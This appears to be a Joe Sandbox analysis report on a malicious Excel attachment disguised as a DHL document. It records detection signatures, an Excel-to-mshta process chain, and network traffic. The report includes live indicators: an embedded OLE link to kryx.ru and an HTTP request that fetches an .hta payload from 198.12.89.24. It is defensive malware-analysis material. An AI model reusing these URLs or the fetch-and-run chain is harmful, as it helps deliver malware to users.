Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 733988905ZHH.xla.xlsx

Overview

General Information

Sample name:DHL 733988905ZHH.xla.xlsx
Analysis ID:1639267
MD5:221f228dfa20495a79346d343e9247dc
SHA1:9cb6b9b2789a5a227c6561790ea353507713f98c
SHA256:279212a280629727edeb1bab801d30116de12ed162400753638a7ec51523aa1b
Tags:DHLxlaxlsxuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7904 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 4540 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 8048 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 3656 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7904, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 4540, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.225.72.170, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7904, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 49991
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 49991, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7904, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: DHL 733988905ZHH.xla.xlsxAvira: detected
Source: DHL 733988905ZHH.xla.xlsxVirustotal: Detection: 50%Perma Link
Source: DHL 733988905ZHH.xla.xlsxReversingLabs: Detection: 33%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.26:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.26:49997 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficDNS query: name: browser.events.data.msn.cn
Source: global trafficDNS query: name: 18.31.95.13.in-addr.arpa
Source: global trafficDNS query: name: kryx.ru
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:57991
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:57991
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:57991
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:57991
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.26:63716 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:63716
Source: global trafficTCP traffic: 192.168.2.26:63716 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:63716
Source: global trafficTCP traffic: 192.168.2.26:63716 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.26:63716
Source: global trafficTCP traffic: 192.168.2.26:63716 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.26:49984 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:49984
Source: global trafficTCP traffic: 192.168.2.26:49984 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:49984
Source: global trafficTCP traffic: 192.168.2.26:49984 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.26:49984
Source: global trafficTCP traffic: 192.168.2.26:49984 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.26:49991 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.26:49991
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 192.168.2.26:49997 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49997
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49996 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.26:49996
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.26:49992
Source: global trafficTCP traffic: 192.168.2.26:49992 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.26:57991 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.26:63716 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.26:49984 -> 162.159.36.2:53
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742025000584&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 5616Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownTCP traffic detected without corresponding DNS query: 198.12.89.24
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule120201v19s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: unknownHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742025000584&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 5616Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache
Source: DHL 733988905ZHH.xla.xlsx, 11160000.0.drString found in binary or memory: https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiary
Source: Primary1742025005421376500_AE2D484D-9882-44E1-8F19-1467DD801064.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Primary1742025005421376500_AE2D484D-9882-44E1-8F19-1467DD801064.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/41402421625
Source: Primary1742025005421376500_AE2D484D-9882-44E1-8F19-1467DD801064.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/rawguids/43296341670
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.26:49996 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.26:49997 version: TLS 1.2

System Summary

barindex
Source: DHL 733988905ZHH.xla.xlsxOLE: Microsoft Excel 2007+
Source: DHL 733988905ZHH.xla.xlsxOLE: Microsoft Excel 2007+
Source: 11160000.0.drOLE: Microsoft Excel 2007+
Source: 11160000.0.drOLE: Microsoft Excel 2007+
Source: DHL 733988905ZHH.xla.xlsxOLE indicator, VBA macros: true
Source: DHL 733988905ZHH.xla.xlsxStream path 'MBD0077BD8A/\x1Ole' : https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiarydEss!yV>k1eKoKip8Wf0hwt2LFXIi14AWl1qEQDJ5YR6EfN4pxyBfHcKFCk7YqRImBuRUXvYJ6cKIIIZvDqFguXpVlcwuI8Rm7Xoyloy8obEYadnu0ZQ8ZxRZhrxKrqO7bpUYYDAWFM1NDUeYf8hAL4j9QhC267CjBezpSMIwjJhwl7YrIyxtFIJDzimDriWoNCc9CZqy1TIHBZ8EU511fpW66IVXALAn7BghaFnWkKe3ZBZJdyX906xL+LWmYIUbR!bf}
Source: 11160000.0.drStream path 'MBD0077BD8A/\x1Ole' : https://kryx.ru/RNF52o?&vestment=hard&firewall=tasteless&bread=rapid&beneficiarydEss!yV>k1eKoKip8Wf0hwt2LFXIi14AWl1qEQDJ5YR6EfN4pxyBfHcKFCk7YqRImBuRUXvYJ6cKIIIZvDqFguXpVlcwuI8Rm7Xoyloy8obEYadnu0ZQ8ZxRZhrxKrqO7bpUYYDAWFM1NDUeYf8hAL4j9QhC267CjBezpSMIwjJhwl7YrIyxtFIJDzimDriWoNCc9CZqy1TIHBZ8EU511fpW66IVXALAn7BghaFnWkKe3ZBZJdyX906xL+LWmYIUbR!bf}
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'dhl 733988905zhh.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal68.expl.winXLSX@6/13@5/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DHL 733988905ZHH.xla.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{AE2D484D-9882-44E1-8F19-1467DD801064} - OProcSessId.datJump to behavior
Source: DHL 733988905ZHH.xla.xlsxOLE indicator, Workbook stream: true
Source: 11160000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL 733988905ZHH.xla.xlsxVirustotal: Detection: 50%
Source: DHL 733988905ZHH.xla.xlsxReversingLabs: Detection: 33%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL 733988905ZHH.xla.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: DHL 733988905ZHH.xla.xlsxStatic file information: File size 1172992 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: 11160000.0.drInitial sample: OLE indicators vbamacros = False
Source: DHL 733988905ZHH.xla.xlsxInitial sample: OLE indicators encrypted = True
